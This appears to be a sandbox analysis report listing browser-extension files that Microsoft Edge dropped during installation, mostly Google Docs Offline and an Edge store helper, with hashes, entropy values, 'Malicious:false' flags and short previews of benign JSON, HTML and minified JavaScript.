                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11280
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.757003753691263
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvlcp7xpHsUy:m8IEI4u8R039y
                                                                                                                                                                                                                                                                                                MD5:8F99E1EF2AFC5F73D9391C248A0390AA
                                                                                                                                                                                                                                                                                                SHA1:DD15DCD68FFB7CBA69C6BBA010DF57A75390C64C
                                                                                                                                                                                                                                                                                                SHA-256:D57215628AF1ECD1ECD8F83DA69245161E4E0A2CE24846B2FFF6B35DA232709B
                                                                                                                                                                                                                                                                                                SHA-512:8F4AA8CE2EA90958BEC430CD46F1E76D8E7617C0735D8AB896F4DA1F84F3220920CCA6CA2DA2D7559355423EC115342183615F7E62E72EE6168A5930A078948B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1h9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APhgiVb
                                                                                                                                                                                                                                                                                                MD5:C1650B58FA1935045570AA3BF642D50D
                                                                                                                                                                                                                                                                                                SHA1:8ECD9726D379A2B638DC6E0F31B1438BF824D845
                                                                                                                                                                                                                                                                                                SHA-256:FEA4B4152B884F3BF1675991AED9449B29253D1323CAD1B5523E63BC4932D944
                                                                                                                                                                                                                                                                                                SHA-512:65217E0EB8613326228F6179333926A68D7DA08BE65C63BD84AEC0B8075194706029583E0B86331E7EEEC4B7167E5BC51BCA4A53CE624CB41CF000C647B74880
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122162
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.444710692772984
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:mKgC9lwS3skucsAHnA5Ayc/XzyEW8WW9Y1G6WIMctANlKIkk0ToyxecN9Bu1/9a:0UsMXz7b81tANlKr5oyPBuza
                                                                                                                                                                                                                                                                                                MD5:01984DBFE92DF14DBD118C381A3D48F4
                                                                                                                                                                                                                                                                                                SHA1:F85DB8A14D3F8A2F66AE153C56D37FAA68EFE8E3
                                                                                                                                                                                                                                                                                                SHA-256:3A78B6FBC16F9FB27CE3ED650ABC31174263D762B71C028CC5D8F5427CBAB082
                                                                                                                                                                                                                                                                                                SHA-512:91A575EC15BD3B37254623F5039B3F437A8EDED7761D1FADF8FD0D5B06247589AC055EEFD8F6627C5F6843663A90330E7603E00315D91D8D7B43F6C87D9D2888
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=fa(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (337)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.678465166211649
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK6ALY6WHXt3:2Q8KVqb2u/Rt3OnjNkdd
                                                                                                                                                                                                                                                                                                MD5:0396274AAF2EAE8917E5EB52CF69DFA4
                                                                                                                                                                                                                                                                                                SHA1:96F53CFB2D6980E12AACEDC6D91759E7F5CA1718
                                                                                                                                                                                                                                                                                                SHA-256:13E1562CD07FC06D692FDF1AA471E3CEAE3CF7C1E42C5345D430A947139A24D5
                                                                                                                                                                                                                                                                                                SHA-512:091212DD84FCE06E0D47C6E26E0959A660B36B53D7AADE1DAC5CA2795E44B4D81AB271213DAE68E70A04EE2BDE9BCE4A63587580EC06B3FBBB7A2576B62ABD16
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;window._docs_chrome_extension_version="1.89.1";}).call(this);.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4884)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130889
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.42886594885059
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:6EO+9lhvoaEAoAf0OliS9XbrrJQiFZcBaw7ILYzEVKOAKa4q32O1I5Z+dOOXW+xi:DoE9Xb9ZevcKOAKaN2O1IwOOJxX9U
                                                                                                                                                                                                                                                                                                MD5:BC4DBD5B20B1FA15F1F1BC4A428343C9
                                                                                                                                                                                                                                                                                                SHA1:A1C471D6838B3B72AA75624326FC6F57CA533291
                                                                                                                                                                                                                                                                                                SHA-256:DFAD2626B0EAB3ED2F1DD73FE0AF014F60F29A91B50315995681CEAAEE5C9EA6
                                                                                                                                                                                                                                                                                                SHA-512:27CB7BD81ED257594E3C5717D9DC917F96E26E226EFB5995795BB742233991C1CB17D571B1CE4A59B482AF914A8E03DEA9CF2E50B96E4C759419AE1D4D85F60A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1899676764\98c38c64-a14c-4801-9958-279e0d5af521.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1899676764\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1899676764\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1899676764\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1899676764\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                Malicious:false
